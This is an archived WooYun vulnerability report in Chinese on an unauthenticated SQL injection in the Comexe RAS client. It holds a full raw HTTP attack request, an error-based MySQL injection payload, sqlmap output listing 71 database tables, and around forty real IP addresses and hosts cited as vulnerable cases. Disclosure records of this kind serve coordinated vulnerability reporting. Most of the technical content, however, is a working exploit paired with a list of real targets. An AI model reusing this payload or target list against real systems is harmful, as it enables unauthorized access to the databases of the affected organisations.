当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117921

漏洞标题:科迈某客户端两处SQL注入影响大量系统(无需登录DBA权限)

相关厂商:深圳市科迈通讯技术有限公司

漏洞作者: YY-2012

提交时间:2015-06-03 11:57

修复时间:2015-09-06 09:08

公开时间:2015-09-06 09:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-03: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认,细节仅向厂商公开
2015-06-11: 细节向第三方安全合作伙伴开放
2015-08-02: 细节向核心白帽子及相关领域专家公开
2015-08-12: 细节向普通白帽子公开
2015-08-22: 细节向实习白帽子公开
2015-09-06: 细节向公众公开

简要描述:

附30多个案例。。

详细说明:

科迈RAS标准版客户端(远程快速应用接入)
无需登录存在SQL注入。

POST /server/cmxpagedquery.php?pgid=AppList&SearchFlag=true HTTP/1.1
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
Referer: http://61.186.152.218:80/
Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3E
Host: 61.186.152.218
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
AppID%5b-1%5d=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=1*&ViewAppValue=1


两个参数存在SQL注入分别是:ViewAppFld和ViewAppValue

aaaaaaaaaaaaa000000000000.jpg

漏洞证明:

aaaaaaaaaaaaa1111111111111111.jpg


aaaaaaaaaaa222222222222222.jpg


aaaaaaaaaaaa3333333333333333.jpg


---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=1) AND (SELECT 4511 FROM(SELECT COUNT(*),CONCAT(0x716b7a7671,(SELECT (ELT(4511=4511,1))),0x71716a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1461=1461&ViewAppValue=1
---
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
Database: rasdatabase
[71 tables]
+---------------------------+
| hbadminrolegroupmembers   |
| hbadminrolerestrictedorgs |
| hbadminroletask           |
| hbadminroleusermembers    |
| hbclientgroupapplication  |
| hbclientgroupprinter      |
| hbdirectoryapplication    |
| hborgapplication          |
| hborglicensepolicy        |
| hborgpolicy               |
| hbpolicyvalues            |
| hbroletask                |
| hbserverapplication       |
| hbserverprinterdriver     |
| hbserverprintinf          |
| hbserverrole              |
| hbservertask              |
| hbtaskaction              |
| hbtaskcondition           |
| hbuserapplication         |
| hbuserdirectory           |
| hbuserorgs                |
| hbuserpolicy              |
| lograsarchi               |
| lograsconcurrenta         |
| lograsconcurrentus        |
| lograsent                 |
| lograssessi               |
| lograstaskactionhist      |
| lograstaskhist            |
| rasactions                |
| rasadminroles             |
| rasadmintasks             |
| rasapplication            |
| rasbadprinterdriver       |
| rascfg                    |
| rasclient                 |
| rasclientgroup            |
| rascompatibilitydriver    |
| rasconcurrentsession      |
| rasconditions             |
| rasconnectionsetting      |
| rasdatabase               |
| rasdirectory              |
| rasdmzserverd             |
| rasdomain                 |
| rasgroupuser              |
| rasinfocollectordata      |
| rasjobs                   |
| rasjobsteps               |
| raslicenseinfo            |
| raslicensetoken           |
| raslicpolicy              |
| raslockdownpolicies       |
| rasmonthlyminute          |
| rasorgs                   |
| rasprinter                |
| rasprinterdriver          |
| rasproductk               |
| rasreqids                 |
| rasroles                  |
| rasrunningservers         |
| rasselection              |
| rasserver                 |
| rasstyle                  |
| rastasks                  |
| rasticketing              |
| rastimedsessio            |
| rasuser                   |
| rasusermng                |
| usermachines              |
+---------------------------+


案例:
http://218.1.41.170:8080/cmxlogin.php?t=14328474426374
http://183.230.42.251:81/CmxDownload.php
http://116.236.205.196/CmxDownload.php
http://221.13.104.174:8888/CmxDownload.php
http://61.186.242.110:8080/CmxDownload.php
http://61.175.246.46:8080/CmxDownload.php
http://113.204.169.94:8888/CmxDownload.php
http://116.236.131.194:8080/CmxDownload.php
http://221.12.100.166:81/CmxDownload.php
http://222.178.221.54:8080/CmxDownload.php
http://61.186.152.218/CmxDownload.php
http://222.177.13.93:8888/CmxDownload.php
http://180.175.223.220:8000/cmxlogin.php?t=14328287201481
http://60.190.177.172:8888/CmxDownload.php
http://221.239.106.90:81/CmxDownload.php
http://122.226.31.30:8080/CmxDownload.php
http://58.222.218.171:8888/CmxDownload.php
http://erp.ap365.com:8088/CmxDownload.php
http://61.161.199.197/CmxDownload.php
http://125.66.20.6/CmxDownload.php
http://180.168.5.162:8080/CmxDownload.php
http://111.30.26.38:8000/CmxDownload.php
http://122.227.188.254/cmxlogin.php?t=14328022273495
http://124.67.67.99:8080/CmxDownload.php
http://61.187.64.183/CmxDownload.php
http://222.34.131.4:81/CmxDownload.php
http://58.42.232.99:81/CmxDownload.php
http://222.163.239.16:8080/CmxDownload.php
http://115.231.212.82:8080/CmxDownload.php
http://114.135.72.241:81/CmxDownload.php
http://58.211.90.4:81/CmxDownload.php
http://218.26.176.140:8080/cmxlogin.php?t=14327793397546
http://61.164.136.94:81/CmxDownload.php
http://202.104.138.38/CmxDownload.php
http://115.236.48.147:81/CmxDownload.php
http://58.246.235.50/CmxDownload.php
http://218.31.33.158:8001/CmxDownload.php
http://221.131.95.136:81/CmxDownload.php
http://60.10.34.57:8888/CmxDownload.php
http://58.18.169.92/CmxDownload.php

修复方案:

过滤

版权声明:转载请注明来源 YY-2012@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-06-08 09:07

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报。

最新状态:

暂无